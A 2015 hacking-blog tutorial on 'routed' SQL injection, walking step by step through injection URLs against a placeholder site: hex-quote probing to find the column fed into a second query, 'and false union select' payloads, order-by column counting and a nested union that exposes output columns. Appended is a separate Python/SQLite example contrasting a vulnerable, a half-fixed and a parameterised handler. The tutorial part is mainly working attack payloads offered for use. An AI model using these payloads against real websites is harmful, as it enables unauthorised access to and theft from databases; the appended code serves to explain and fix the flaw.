Wednesday, November 4, 2015

Routed SQLi Method

Hey guys! Hope you're all fine today :p

Now I'm going to teach you the routed query SQLi method.

So, let's start.

First, we have to find the vuln columns of the target website.

web.com/index.php?id=1' union select 1,2,3,4,5--+

Sadly, no vuln columns are appearing :\

Let's check the page source:

view-source:http://web.com/index.php?id=1' union select 1,2,3,4,5--+

:( Again, no vuln columns are appearing. :) So, it's time to use the routed query method to dump the vuln columns.

Let's find the vuln column in which we can use the routed SQLi method.

To find it, we'll use 0x27, which is the hex encoding of ' (a single quote):

web.com/index.php?id=1' union select 1,2,3,4,0x27--+ > No error
web.com/index.php?id=1' union select 1,2,3,0x27,5--+ > No error
web.com/index.php?id=1' union select 1,2,0x27,4,5--+ > No error
web.com/index.php?id=1' union select 1,0x27,3,4,5--+ > Error
web.com/index.php?id=1' union select 0x27,2,3,4,5--+ > No error

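Hooray! :D We've found the vuln column, and it is 2. The error means the value from column 2 is being placed into a second query, where the stray ' breaks the syntax.
Now we have to use the routed SQLi query.

In this query, we first have to put "and false" before "union select", and put "1" in the vuln column, where the quotes (") wrap the routed query and 1 is the injection point.
Hope you know that a query without an injection point never works. So, let's begin.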

Time to find the number of columns:

web.com/index.php?id=1' and false union select 1,"1 order by 1",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 2",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 5",3,4,5--+ > No error
web.com/index.php?id=1' and false union select 1,"1 order by 6",3,4,5--+ > Error

So, the columns are 6 :D

Let's dump the vuln columns:

web.com/index.php?id=1' and false union select 1,"1 union select 1,2,3,4,5,6",3,4,5--+

:D yeaahhhhhhhh... The vuln columns are appearing.

Hope you like my tutorial ;)
#D4RK_4NG31
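
Why column 2 behaves this way, seen from the application side, as an added example that is not from the original post: a handler whose first query result is concatenated into a second query, next to a version that binds parameters in both. The schema, function names and sample values are constructed, Python with SQLite stands in for the site's PHP backend (an assumption), and the half-fixed variant goes slightly beyond the post to show that binding only the first query is not enough.

```python
import sqlite3

# Constructed input: column 2 of the first query carries SQL text for the second.
ROUTED_INPUT = "0 union select 1,'0 union select 31337',3"

def make_db():
    # Constructed sample data, in-memory only. author_id is TEXT so that a
    # tainted stored value (row 2) can be modelled as well.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER, author_id TEXT, title TEXT);
        CREATE TABLE authors(id INTEGER, name TEXT);
        INSERT INTO articles VALUES (1, '10', 'hello');
        INSERT INTO articles VALUES (2, '0 union select 31337', 'tainted row');
        INSERT INTO authors VALUES (10, 'alice');
    """)
    return conn

def author_vulnerable(conn, article_id):
    # Query 1: request value concatenated into SQL. Its rows are never shown,
    # which is why no column shows up in the page or its source.
    q1 = "SELECT id, author_id, title FROM articles WHERE id = " + article_id
    row = conn.execute(q1).fetchone()
    if row is None:
        return []
    # Query 2: column 2 of query 1 is concatenated again. Only this is displayed.
    q2 = "SELECT name FROM authors WHERE id = " + str(row[1])
    return [r[0] for r in conn.execute(q2)]

def author_half_fixed(conn, article_id):
    # Query 1 is bound, but query 2 still trusts whatever the database returned.
    row = conn.execute(
        "SELECT id, author_id, title FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    if row is None:
        return []
    q2 = "SELECT name FROM authors WHERE id = " + str(row[1])
    return [r[0] for r in conn.execute(q2)]

def author_hardened(conn, article_id):
    # Both queries bind their values, so neither input is parsed as SQL.
    row = conn.execute(
        "SELECT id, author_id, title FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    if row is None:
        return []
    rows = conn.execute("SELECT name FROM authors WHERE id = ?", (row[1],))
    return [r[0] for r in rows]
```

When reviewing code for this pattern, treat every value read back from a result set as untrusted input to the next statement, not only values that come straight from the request.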
